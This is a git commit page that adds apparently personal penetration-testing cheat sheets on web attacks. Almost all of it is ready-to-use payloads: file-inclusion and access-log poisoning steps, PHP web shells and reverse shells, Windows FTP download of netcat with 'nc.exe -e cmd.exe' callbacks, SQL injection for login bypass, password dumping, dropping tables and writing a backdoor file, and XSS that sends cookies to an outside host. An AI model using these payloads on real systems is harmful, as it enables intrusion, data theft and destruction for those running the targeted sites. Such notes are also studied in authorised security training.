note updates

2017-01-16 21:52:08 +01:00 · 2017-01-16 21:52:08 +01:00 · 1ec27c494c
parent fefa6e6bb7
commit 1ec27c494c
5 changed files with 112 additions and 0 deletions
--- a/profile_files/.ptz/v3das/web_file_inclusion.txt
+++ b/profile_files/.ptz/v3das/web_file_inclusion.txt
@ -0,0 +1,41 @@
+
+Local File Inclusion
+====================
+
+The %00 make php 5.3 and below ignore everything after that.
+
+Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
+...then let's add code to the access log :)
+~# nc 192.168.1.1 80
+<?php echo shell_exec($_GET['cmd']);?>
+...and use it
+http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
+...or php shell on linux:)
+<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
+...finally send the requests to nc and exploit:
+
+# Windows FTP upload
+echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
+nc.exe -e cmd.exe 192.168.1.1  31337
+
+- - - - - - - -
+<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
+<? system('echo haxor >> ftp.txt'); ?>
+<? system('echo haxor >> ftp.txt'); ?>
+<? system('echo bin >> ftp.txt'); ?>
+<? system('echo GET nc.exe >> ftp.txt'); ?>
+<? system('echo bye >> ftp.txt'); ?>
+<? system('ftp -s:ftp.txt'); ?>
+<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
+
+<?php phpinfo()?>
+<? system("cat /etc/passwd"); ?>
+<?php echo shell_exec($_GET["cmd"]);?>
+<?php include="124.1.1.1" ?>
+
+
+Remote file Inclusion
+=====================
+Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
+Note: the login.txt contains 
+
--- a/profile_files/.ptz/v3das/web_fuzz_strings.txt
+++ b/profile_files/.ptz/v3das/web_fuzz_strings.txt
@ -0,0 +1,14 @@
+
+XSS locator
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+
+XSS locator 2
+'';!--"<XSS>=&{()}
+
+<img src="//" onerror=alert(document.cookie);>
+
+
+Other fuzzing char list
+><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}
+
--- a/profile_files/.ptz/v3das/web_injection_php.txt
+++ b/profile_files/.ptz/v3das/web_injection_php.txt
@ -0,0 +1,11 @@
+
+PHP command injection
+=====================
+
+There are just some ideas.
+
+<? system('apt-get install netcat -y'); ?>
+<? system('netcat 14.5.1.44 8080'); ?>
+<? system('wget http://14.5.1.44:8080/'); ?>
+<? system('init 6'); ?>
+
--- a/profile_files/.ptz/v3das/web_injection_sqli.txt
+++ b/profile_files/.ptz/v3das/web_injection_sqli.txt
@ -0,0 +1,43 @@
+
+SQLi notes
+==========
+
+Login bypass
+any' or 1=1 limit 1 ;#
+' OR '1' = '1 / ' OR '1' = '1
+;#   ;--   #
+
+
+?id=737 order by 6   --> Testing max columns
+?id=737 union select all 1,2,3,4,5,6    --> Testing max columns in database
+?id=737 union select all 1,2,3,4,@@version,6    --> Version enumeration, commands to run or exploits?
+?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables    --> Table enumeration
+?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user'    --> Column enumeration
+?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users    --> After knowing about "users" pull out the info
+
+
+More examples
+
+x%') # 
+x%') or 1=1 #
+x%') order by 4 #
+x%') union select all 4 #
+x%') union select all 1,2,3@@version #
+x%') and 1=1 #
+
+x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) #
+x%') and drop table if exists customers #
+x%') and create database test # 
+x%') ; DROP ALL TABLES; #
+
+@@hostname
+
+wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
+
+
+Adding backdor.php
+?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
+
+Getting a shell with php execute
+192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'
+
--- a/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt
+++ b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt
@ -0,0 +1,3 @@
+
+<script>new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;</script>
+
				`@ -0,0 +1,3 @@`

				`<script>new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;</script>`